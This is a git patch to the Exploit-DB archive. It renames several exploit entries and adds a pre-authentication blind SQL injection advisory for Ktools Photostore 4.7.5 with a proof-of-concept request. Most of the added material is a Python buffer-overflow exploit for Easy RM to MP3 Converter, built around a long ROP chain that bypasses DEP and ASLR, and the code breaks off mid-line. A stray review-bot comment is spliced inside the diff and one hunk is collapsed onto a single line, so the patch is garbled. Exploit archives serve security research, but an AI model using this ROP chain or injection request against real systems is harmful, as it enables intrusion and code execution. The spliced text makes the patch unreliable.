From 0fddce018e05a4155635b867b9e0d6123e71fe0b Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 1 Jul 2016 05:05:35 +0000
Subject: [PATCH] DB: 2016-07-01
2 new exploits
phpBookingCalendar <= 1.0c - (details_view.php) Remote SQL Injection
TFT Gallery <= 0.10 - Password Disclosure Remote Exploit
phpBookingCalendar 1.0c - (details_view.php) SQL Injection
TFT Gallery 0.10 - Password Disclosure Remote Exploit
Seattle Lab Mail 5.5 - POP3 Buffer Overflow
Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow
Ktools Photostore 4.7.5 - Blind SQL Injection
Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass
---
 files.csv | 8 +-
 platforms/php/webapps/40046.txt | 45 ++++++++
 platforms/windows/local/39933.py | 192 +++++++++++++++++++++++++++++++
 3 files changed, 242 insertions(+), 3 deletions(-)
 create mode 100755 platforms/php/webapps/40046.txt
 create mode 100755 platforms/windows/local/39933.py
diff --git a/files.csv b/files.csv
index b62935331..ffaedf713 100755
--- a/files.csv
+++ b/files.csv
@@ -1349,8 +1349,8 @@ id,file,description,date,author,platform,type,port
 1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer (createTextRang) Download Shellcoded Exploit",2006-03-23,ATmaCA,windows,remote,0
 1608,platforms/php/webapps/1608.php,"WebAlbum <= 2.02pl - COOKIE[skin2] Remote Code Execution Exploit",2006-03-25,rgod,php,webapps,0
 1609,platforms/php/webapps/1609.pl,"PHP Ticket <= 0.71 (search.php) Remote SQL Injection Exploit",2006-03-25,undefined1_,php,webapps,0
-1610,platforms/php/webapps/1610.txt,"phpBookingCalendar <= 1.0c - (details_view.php) Remote SQL Injection",2006-03-25,undefined1_,php,webapps,0
-1611,platforms/php/webapps/1611.pl,"TFT Gallery <= 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0
+1610,platforms/php/webapps/1610.txt,"phpBookingCalendar 1.0c - (details_view.php) SQL Injection",2006-03-25,undefined1_,php,webapps,0
+1611,platforms/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0
 1612,platforms/php/webapps/1612.php,"CuteNews <= 1.4.1 (function.php) Local File Include Exploit",2006-03-26,"Hamid Ebadi",php,webapps,0
 1613,platforms/windows/dos/1613.c,"Vavoom <= 1.19.1 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0
 1614,platforms/windows/dos/1614.c,"csDoom <= 0.7 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0
@@ -14196,7 +14196,7 @@ id,file,description,date,author,platform,type,port
 16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection",2011-02-08,metasploit,windows,remote,0
 16397,platforms/windows/remote/16397.rb,"Lyris ListManager MSDE Weak sa Password",2010-09-20,metasploit,windows,remote,0
 16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server Hello Overflow",2010-04-30,metasploit,windows,remote,0
-16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail 5.5 - POP3 Buffer Overflow",2010-04-30,metasploit,windows,remote,0
+16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow",2010-04-30,metasploit,windows,remote,0
 16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",2010-05-09,metasploit,windows,remote,0
 16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve Message Engine Heap Overflow",2010-04-30,metasploit,windows,remote,0
 16402,platforms/windows/remote/16402.rb,"CA BrightStor HSM Buffer Overflow",2010-05-09,metasploit,windows,remote,0
@@ -35864,6 +35864,7 @@ id,file,description,date,author,platform,type,port
 39652,platforms/multiple/dos/39652.txt,"Adobe Flash - Color.setTransform Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0
 39653,platforms/php/dos/39653.txt,"PHP 5.5.33 - Invalid Memory Write",2016-04-01,vah_13,php,dos,0
 39654,platforms/windows/dos/39654.pl,"Xion Audio Player <= 1.5 (build 160) - .mp3 Crash PoC",2016-04-04,"Charley Celice",windows,dos,0
+40046,platforms/php/webapps/40046.txt,"Ktools Photostore 4.7.5 - Blind SQL Injection",2016-06-30,"Gal Goldshtein and Viktor Minin",php,webapps,80
 39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0
 39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0
 39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 / 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0
@@ -36121,6 +36122,7 @@ id,file,description,date,author,platform,type,port
 39930,platforms/osx/dos/39930.c,"OS X Kernel - Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0
 39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Stored XSS",2016-06-13,"Hamit Abis",php,webapps,80
 39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - CSRF Shell Upload",2016-06-13,"Ali Ghanbari",php,webapps,80
+39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass",2016-06-13,"Fitzl Csaba",windows,local,0
 39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
 39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
 39936,platforms/php/webapps/39936.txt,"Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
diff --git a/platforms/php/webapps/40046.txt b/platforms/php/webapps/40046.txt
new file mode 100755
index 000000000..f8d693521
--- /dev/null
+++ b/platforms/php/webapps/40046.txt
@@ -0,0 +1,45 @@
+Title : Ktools Photostore <= 4.7.5 (Pre-Authentication) Blind SQL Injection
+CVE-ID : CVE-2016-4337
+Google Dork: inurl:mgr.login.php
+Product : Photostore
+Affected : Versions prior to 4.7.5
+Impact : Critical
+Remote : Yes
+Website link: http://www.ktools.net
+Reported : 02/06/2016
+Authors : Gal Goldshtein and Viktor Minin
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+No authentication (login) is required to exploit this vulnerability.
+The Photostore application password recovery module is prone to a blind sql injection attack.
+An attacker can exploit this vulnerability to retrieve all the data stored in the application's database.
+
+
+Vulnerable code is located in the mgr.login.php file:
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+case 'recover_login': {
+ mysqli_query( $db, '' . 'SELECT username,password,email,admin_id FROM ' . $dbinfo[pre] . 'admins where email = \'' . $_POST['email'] . 
'\'' );
+ $result = ;
+ mysqli_num_rows( $result );
+ $returned_rows = ;
+ mysqli_fetch_array( $result );
+ $db_admin_user = ;
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+PoC:
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+POST /photostore/manager/mgr.login.php?pmode=recover_login HTTP/1.1
+Host: victim.net
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://server/photostore/manager/mgr.login.php?username=demo&password=demo
+Cookie: member[umem_id]=58C05864CA6A59DBGHJSKDHGDGS770D5; PHPSESSID=30afayreighgfdgucb0d2b0c6dece3158
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 9
+
+email=%27%20[SQL PAYLOAD];#
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
diff --git a/platforms/windows/local/39933.py b/platforms/windows/local/39933.py
new file mode 100755
index 000000000..8453994d2
--- /dev/null
+++ b/platforms/windows/local/39933.py
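Review bot: The affected-version range in the new advisory is stated inconsistently: the `Title` line says `<= 4.7.5` and the files.csv entry says 4.7.5, while the `Affected :` line says `Versions prior to 4.7.5`, which excludes 4.7.5 itself, so one of them needs correcting before a reader can tell whether 4.7.5 is vulnerable or the fixed release. The quoted `mgr.login.php` excerpt contains empty assignments (`$result = ;`, `$returned_rows = ;`), which looks like decoder output rather than the shipped source; a one-line remark saying so would stop readers from taking it as literal code. The advisory names the root cause (`$_POST['email']` concatenated into the query string) but gives no remediation; a closing line such as `Fix: pass the email value as a bound parameter of a prepared statement (mysqli_prepare) instead of concatenating it into the query` would round it out for defenders and patch triage.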
@@ -0,0 +1,192 @@ +# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass +# Date: 2016-06-12 +# Exploit Author: Csaba Fitzl +# Vendor Homepage: N/A +# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe +# Version: 2.7.3.700 +# Tested on: Windows 7 x64 +# CVE : CVE-2009-1330 + +import struct + +def create_rop_chain(): + + # rop chain generated with mona.py - www.corelan.be + # added missing parts, and some optimisation by Csaba Fitzl + rop_gadgets = [ + + #mov 1000 to EDX - Csaba + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x10025a1c, # XOR EDX,EDX # RETN + 0x1002bc3d, # MOV EAX,411 # RETN + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc24, # ADD EAX,80 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc41, # ADD EAX,40 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, 
# ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x10023327, # INC EAX # RETN + 0x10023327, # INC EAX # RETN + 0x10023327, # INC EAX # RETN + # AT this point EAX = 0x1000 + 0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI + 0x41414141, # Filler (compensate) + + + 0x10026d56, # POP EAX # RETN [MSRMfilter03.dll] + 0x10032078, # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll] + 0x1002e0c8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll] + + 0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x10027c5a, # POP EBP # RETN [MSRMfilter03.dll] + 0x1001b058, # & push esp # ret [MSRMfilter03.dll] + 0x1002b93e, # POP EAX # RETN [MSRMfilter03.dll] + 0xfffffffb, # put delta into eax (-> put 0x00000001 into ebx) + 0x1001d2ac, # ADD EAX,4 # RETN + 0x10023327, # INC EAX # RETN + 0x10023327, # INC EAX # RETN + 0x1001bdee, # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + + 0x10029f74, # POP ECX # RETN [MSRMfilter03.dll] + 0xffffffff, # + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # 
AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # 
RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002bc6a, # POP EDI # RETN [MSRMfilter03.dll] + 0x1001c121, # RETN (ROP NOP) [MSRMfilter03.dll] + 0x10026f2b, # POP EAX # RETN [MSRMfilter03.dll] + 0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP + 0x1002bc07 # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL + + ] + return ''.join(struct.pack('